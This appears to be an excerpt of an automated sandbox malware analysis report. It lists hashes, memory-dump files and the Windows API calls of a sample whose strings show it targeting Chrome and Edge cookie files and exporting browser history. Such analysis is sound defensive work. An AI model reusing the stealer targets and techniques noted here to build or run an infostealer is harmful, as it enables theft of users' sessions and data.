                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                  • String ID:
                                                  • API String ID: 1857427562-0
                                                  • Opcode ID: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                  • Opcode Fuzzy Hash: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                  APIs
                                                    • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
                                                    • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
                                                    • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                                  • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQuerySleepValue
                                                  • String ID: HSG$HVP$exepath$xdF
                                                  • API String ID: 4119054056-398512730
                                                  • Opcode ID: e4b453d0fbe35fa49ed9cbafe6768c3a8c416419d1c3e5900169b8e9e68fd57e
                                                  • Instruction ID: 7f535f989f64e3217726da85717e45219a172cbdcd35e6ae3f2d68e0f7be43ad
                                                  • Opcode Fuzzy Hash: e4b453d0fbe35fa49ed9cbafe6768c3a8c416419d1c3e5900169b8e9e68fd57e
                                                  • Instruction Fuzzy Hash: 1F21D8A1B043042BD604B7365D4AAAF724D8B80358F40897FBA56E73D3EEBD9C45826D
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                    • Part of subcall function 004461B8: HeapAlloc.KERNEL32(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                  • _free.LIBCMT ref: 0044F43F
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 2278895681-0
                                                  • Opcode ID: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                  • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                  • Opcode Fuzzy Hash: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                  • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
                                                  • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4EA
                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4FB
                                                  • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C508
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                  • String ID:
                                                  • API String ID: 1852769593-0
                                                  • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                  • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                  • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                  • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                  APIs
                                                  • GetLastError.KERNEL32(?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044831E
                                                  • _free.LIBCMT ref: 00448353
                                                  • _free.LIBCMT ref: 0044837A
                                                  • SetLastError.KERNEL32(00000000), ref: 00448387
                                                  • SetLastError.KERNEL32(00000000), ref: 00448390
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                  • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                  • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                  • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                  APIs
                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpen$FileImageName
                                                  • String ID:
                                                  • API String ID: 2951400881-0
                                                  • Opcode ID: 86c9f0b933065f30fb7de588293abdcc028dc5bd0d1024c3ead9711c80f94643
                                                  • Instruction ID: eb9e11a2b0883253d54455b1eb0df9c10e535dd1e95c930e162dea6fb874dde8
                                                  • Opcode Fuzzy Hash: 86c9f0b933065f30fb7de588293abdcc028dc5bd0d1024c3ead9711c80f94643
                                                  • Instruction Fuzzy Hash: 2F01F231680215ABD71066949C8AFA7B66C8B84756F0001ABFA08D2292EE74CD81466A
                                                  APIs
                                                  • _free.LIBCMT ref: 00450A54
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00450A66
                                                  • _free.LIBCMT ref: 00450A78
                                                  • _free.LIBCMT ref: 00450A8A
                                                  • _free.LIBCMT ref: 00450A9C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                  • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                  • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                  APIs
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0041763E
                                                  • GetWindowTextW.USER32(?,?,0000012C), ref: 00417670
                                                  • IsWindowVisible.USER32(?), ref: 00417677
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessWindow$Open$TextThreadVisible
                                                  • String ID: (VG
                                                  • API String ID: 3142014140-3443974315
                                                  • Opcode ID: b6819e3733b73a50daae7a69499ace447c398b8e8985a3f5d3c365d97f8645e0
                                                  • Instruction ID: 57afc706987f0d359dfa573bc041c79e98ae29994c94316b8148008c339bd05b
                                                  • Opcode Fuzzy Hash: b6819e3733b73a50daae7a69499ace447c398b8e8985a3f5d3c365d97f8645e0
                                                  • Instruction Fuzzy Hash: 6E7109311082419AC365FB22D8959EFB3E5BFD4308F50493FF18A560E5EF746A49CB8A
                                                  APIs
                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Enum$InfoQueryValue
                                                  • String ID: [regsplt]
                                                  • API String ID: 3554306468-4262303796
                                                  • Opcode ID: e8d87c0d90bc34e8b451b419191c2e7b9b9d31020589466bd6458d4b0e25a2bf
                                                  • Instruction ID: fa843d34e07254c46a29a5d4d7bbb73928c81f50e0ccc4a220fcc0531dc04ae2
                                                  • Opcode Fuzzy Hash: e8d87c0d90bc34e8b451b419191c2e7b9b9d31020589466bd6458d4b0e25a2bf
                                                  • Instruction Fuzzy Hash: DF512C72900219AADB11EB95DC86EEEB77DAF04304F1000BAE505F6191EF746B48CBA9
                                                  APIs
                                                  • _strpbrk.LIBCMT ref: 0044E7B8
                                                  • _free.LIBCMT ref: 0044E8D5
                                                    • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,?,?,?,?,?,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                                    • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD8C
                                                    • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000), ref: 0043BD93
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                  • String ID: *?$.
                                                  • API String ID: 2812119850-3972193922
                                                  • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                  • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                  • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                  • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CountEventTick
                                                  • String ID: !D@$,aF
                                                  • API String ID: 180926312-3317875915
                                                  • Opcode ID: 015c526ce0c7baa6a79019f70ae75357c77a1d64b83d3a57c9cd340c46685d13
                                                  • Instruction ID: a18c2cf71696728a803f4d48a8d0c2278a59ecc2ec6ff56e3a85b819d46b2ac8
                                                  • Opcode Fuzzy Hash: 015c526ce0c7baa6a79019f70ae75357c77a1d64b83d3a57c9cd340c46685d13
                                                  • Instruction Fuzzy Hash: 4F51B6315082019AC724FB32D852AFF73A5AF94304F50483FF546671E2EF3C5945C68A
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                  • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                  • String ID: /sort "Visit Time" /stext "$@NG
                                                  • API String ID: 368326130-3944316004
                                                  • Opcode ID: 4ede8bf65a5c07a3a5ac0da2bc4968108d88963ec285a5b23a9a2a3118e480f0
                                                  • Instruction ID: 88307c0d9f74f86904655d2c31cb74d6ebeba16a9e6c7dae8368527950f1c452
                                                  • Opcode Fuzzy Hash: 4ede8bf65a5c07a3a5ac0da2bc4968108d88963ec285a5b23a9a2a3118e480f0
                                                  • Instruction Fuzzy Hash: EB316171A001195ACB15FBA6DC969ED7375AF90308F00007FF60AB71E2EF785E49CA99
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474F08,?,0043CE65,FF8BC35D,00474F08,00474F08), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,FF8BC35D,00474F08,00474F08), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                    • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                    • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                  • _free.LIBCMT ref: 0044F050
                                                  • _free.LIBCMT ref: 0044F086
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast_abort
                                                  • String ID: IP$IP
                                                  • API String ID: 2991157371-4167409819
                                                  • Opcode ID: e5cd2967445071e6bfe31aa1a48247ff35ff00e78bbd9f02ad68eb6c8bd53105
                                                  • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                  • Opcode Fuzzy Hash: e5cd2967445071e6bfe31aa1a48247ff35ff00e78bbd9f02ad68eb6c8bd53105
                                                  • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 00416330
                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                    • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                    • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen$CloseCreateValue
                                                  • String ID: !D@$0Q$okmode
                                                  • API String ID: 3411444782-1117221533
                                                  • Opcode ID: 56f16cec1f0c4c13d398d308520266d76c14b466bc5d3b5cba1d7f98db00ff35
                                                  • Instruction ID: 3691d04bdc76b081f03c0e50e7d604d291fd2bc6213442c77ae478975c73e837
                                                  • Opcode Fuzzy Hash: 56f16cec1f0c4c13d398d308520266d76c14b466bc5d3b5cba1d7f98db00ff35
                                                  • Instruction Fuzzy Hash: E211A871B042011BDA187B72D822BBD2296DB84349F80483FF50AAF2E2DFBD4C51535D
                                                  APIs
                                                    • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                  Strings
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                  • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExistsFilePath
                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                  • API String ID: 1174141254-1980882731
                                                  • Opcode ID: 2c67092e15a4999aa6b018a61603dd6f1321c7588d56d9784008b3db444931e0
                                                  • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                  • Opcode Fuzzy Hash: 2c67092e15a4999aa6b018a61603dd6f1321c7588d56d9784008b3db444931e0
                                                  • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                  APIs
                                                    • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                  Strings
                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
